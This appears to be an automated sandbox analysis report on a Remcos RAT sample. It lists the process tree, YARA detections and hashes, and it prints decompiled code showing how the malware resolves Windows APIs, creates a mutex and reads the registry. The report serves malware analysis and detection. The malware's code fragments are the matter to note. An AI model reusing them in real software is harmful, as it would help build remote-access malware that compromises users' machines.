                                      • Detection: 11%, ReversingLabs
                                      Reputation:low

                                      General

                                      Start time:06:03:09
                                      Start date:29/04/2021
                                      Path:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'
                                      Imagebase:0xfd0000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.780636700.0000000003E8B000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.781443613.00000000049AD000.00000004.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      General

                                      Start time:06:03:13
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                      Imagebase:0x11d0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:06:03:13
                                      Start date:29/04/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:06:03:13
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\timeout.exe
                                      Wow64 process (32bit):true
                                      Commandline:timeout 1
                                      Imagebase:0xb30000
                                      File size:26112 bytes
                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:06:03:17
                                      Start date:29/04/2021
                                      Path:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Imagebase:0x320000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      General

                                      Start time:06:03:17
                                      Start date:29/04/2021
                                      Path:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'
                                      Imagebase:0x530000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.752626728.0000000003279000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.759339292.0000000003C85000.00000004.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      General

                                      Start time:06:03:18
                                      Start date:29/04/2021
                                      Path:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Imagebase:0x870000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Remcos_1, Description: Remcos Payload, Source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                      Reputation:low

                                      General

                                      Start time:06:03:19
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                      Imagebase:0x11d0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:06:03:19
                                      Start date:29/04/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Start time:06:03:20
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\timeout.exe
                                      Wow64 process (32bit):true
                                      Commandline:timeout 1
                                      Imagebase:0xb30000
                                      File size:26112 bytes
                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Start time:06:03:22
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 1448
                                      Imagebase:0xbd0000
                                      File size:434592 bytes
                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      General

                                      Start time:06:03:25
                                      Start date:29/04/2021
                                      Path:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Imagebase:0x220000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Start time:06:03:26
                                      Start date:29/04/2021
                                      Path:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Imagebase:0xf80000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Remcos_1, Description: Remcos Payload, Source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, Author: unknown

                                      General

                                      Start time:06:03:29
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6648 -s 1476
                                      Imagebase:0xbd0000
                                      File size:434592 bytes
                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      General

                                      Start time:06:03:29
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                      Imagebase:0x11d0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Start time:06:03:30
                                      Start date:29/04/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Start time:06:03:30
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\timeout.exe
                                      Wow64 process (32bit):true
                                      Commandline:timeout 1
                                      Imagebase:0xb30000
                                      File size:26112 bytes
                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Disassembly

                                      Code Analysis

                                        Executed Functions

                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL ref: 056D11B1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.715862513.00000000056D0000.00000040.00000001.sdmp, Offset: 056D0000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
                                        • API String ID: 6842923-0
                                        • Opcode ID: 2edce9ec2a047d1c88bcabe39d3a2e7429d142b324f20ed51a28141933c8026c
                                        • Instruction ID: 65c0ac0e87ccb77ecf14ab71248ee8bf6028a994820035420b96fa4e8305c5fd
                                        • Opcode Fuzzy Hash: 2edce9ec2a047d1c88bcabe39d3a2e7429d142b324f20ed51a28141933c8026c
                                        • Instruction Fuzzy Hash: 12A12870E041098BDB28CFE9D494BACFBB1BF46359F188518D402BB790D7B99A85CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL ref: 056D11B1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.715862513.00000000056D0000.00000040.00000001.sdmp, Offset: 056D0000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
                                        • API String ID: 6842923-0
                                        • Opcode ID: 695670e3e318cf95be57dcae71f476e73401e3656f08cbd3688cd3bcff60128a
                                        • Instruction ID: 5a7425d95418164176e9deb32ed52fb1d6b3fde891c5199bf6beb3af1c6e9a70
                                        • Opcode Fuzzy Hash: 695670e3e318cf95be57dcae71f476e73401e3656f08cbd3688cd3bcff60128a
                                        • Instruction Fuzzy Hash: E0612770D00249CBDB24CFE8D498AADFBB2BF4A318F148519D412BB781D7B59985CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 056D1106
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.715862513.00000000056D0000.00000040.00000001.sdmp, Offset: 056D0000, based on PE: false
                                        Similarity
                                        • API ID: KernelObjectSecurity
                                        • String ID:
                                        • API String ID: 3015937269-0
                                        • Opcode ID: 636a13bd36fe008c248e5f6261c1f9daf10508cd22b1fd0fc7f2ffa397244b06
                                        • Instruction ID: 3a6e46c995557a798cde70ec10ca4364c61f80ded3030c9f297a7b851d3138e1
                                        • Opcode Fuzzy Hash: 636a13bd36fe008c248e5f6261c1f9daf10508cd22b1fd0fc7f2ffa397244b06
                                        • Instruction Fuzzy Hash: 542107B1D042098FCB10CF9AC885B9EFBF4EB49324F14842AE519A7740D778A945CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.715862513.00000000056D0000.00000040.00000001.sdmp, Offset: 056D0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 6b5c8e1009c115fb5ec99e9434e89a4c6b72812118395baa9310a4b167f01ee8
                                        • Instruction ID: fffce7c9d319ddf0c702655a683959f5252be27f754a73ee674a55efbab10199
                                        • Opcode Fuzzy Hash: 6b5c8e1009c115fb5ec99e9434e89a4c6b72812118395baa9310a4b167f01ee8
                                        • Instruction Fuzzy Hash: 34116AB1D003498FCB14CFA9C4497DEFBF4AB88324F14882AC555A7740CB78A945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.715862513.00000000056D0000.00000040.00000001.sdmp, Offset: 056D0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: d2de8f643855247747fca3888b3fc93b6ff15b7d6f6c63cb1a391ca6a8f6f6bd
                                        • Instruction ID: 76033fd4bf6b9cccce241a9bd6e02c1df1bbc6d69b610f2a7c8438546a4f20c0
                                        • Opcode Fuzzy Hash: d2de8f643855247747fca3888b3fc93b6ff15b7d6f6c63cb1a391ca6a8f6f6bd
                                        • Instruction Fuzzy Hash: AF113AB1D043488FCB10DFAAC4487DEFBF4EF88224F14842AD559A7740DB75A945CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Executed Functions

                                        C-Code - Quality: 100%
                                        			E00409908() {
                                        				struct HINSTANCE__* _t1;
                                        				_Unknown_base(*)()* _t2;
                                        				_Unknown_base(*)()* _t22;
                                        
                                        				_t1 = LoadLibraryA("Psapi.dll"); // executed
                                        				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
                                        				 *0x41bc94 = _t2;
                                        				if(_t2 == 0) {
                                        					 *0x41bc94 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                                        				}
                                        				 *0x41bc90 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                                        				if( *0x41bc94 == 0) {
                                        					 *0x41bc90 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                                        				}
                                        				 *0x41bca0 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                                        				 *0x41c1e4 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                        				 *0x41c1e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
                                        				 *0x41bc98 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
                                        				 *0x41bcd0 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                                        				 *0x41bca4 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
                                        				 *0x41bc78 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                                        				 *0x41bca8 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                                        				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                                        				 *0x41bc9c = _t22;
                                        				return _t22;
                                        			}

                                        Instruction addresses (one per decompiled statement above): 0x0040991b, 0x00409924, 0x0040992c, 0x00409933, 0x00409944, 0x00409944, 0x0040995f, 0x00409964, 0x00409975, 0x00409975, 0x00409993, 0x004099a7, 0x004099bb, 0x004099cf, 0x004099e3, 0x004099f7, 0x00409a0b, 0x00409a1c, 0x00409a24, 0x00409a28, 0x00409a2e

                                        APIs
                                        • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,0041BA38,0041BCB0,00000000,00408F24,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040991B
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409924
                                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040993F
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409942
                                        • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409953
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409956
                                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409970
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409973
                                        • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409984
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409987
                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409998
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040999B
                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099AC
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099AF
                                        • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099C0
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099C3
                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099D4
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099D7
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099E8
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099EB
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099FC
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099FF
                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A10
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409A13
                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A21
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409A24
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule$LibraryLoad
                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
                                        • API String ID: 551388010-2914448473
                                        • Opcode ID: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                        • Instruction ID: 4c9355c828fc4da35060c465c8423d7dda30a1a04bb52c9e9a5aad065eac730d
                                        • Opcode Fuzzy Hash: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                        • Instruction Fuzzy Hash: F721AFB0E81358B9DA206BB56C4EFDB7E59DA94B54323442BB40893194EFBCC480CEDC
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 00409823: malloc.MSVCRT ref: 00409846
                                          • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                          • Part of subcall function 00409823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                          • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                          • Part of subcall function 00409823: malloc.MSVCRT ref: 00409898
                                          • Part of subcall function 00409823: free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                          • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                          • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BC80,?,?,00000000), ref: 00408CB7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408CC6
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 00408D31
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408D42
                                        • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408D50
                                        • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D5E
                                        • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D6A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408D73
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408D8C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(004140D8,Software\,00000000,0000000E,00415774), ref: 00408DB4
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00415774), ref: 00408DC1
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00415774), ref: 00408DD1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DDA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DE3
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00415774), ref: 00408DF5
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00415774), ref: 00408E11
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,004140D8,?,?,?,?,0000000E,00415774), ref: 00408E37
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408E56
                                        • OpenMutexA.KERNEL32 ref: 00408E80
                                        • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00415774), ref: 00408E93
                                        • CloseHandle.KERNEL32(004140D8,?,?,?,?,0000000E,00415774), ref: 00408E9C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00415774), ref: 00408EAD
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408ECC
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EEF
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EFA
                                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F04
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F0A
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,00000104,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F2F
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F61
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F6A
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F89
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FAF
                                        • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408FD4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FF2
                                          • Part of subcall function 0040B47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00407A4E,80000001,00000000), ref: 0040B495
                                          • Part of subcall function 0040B47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,0041BA38,?,00407A4E,80000001,00000000), ref: 0040B4AA
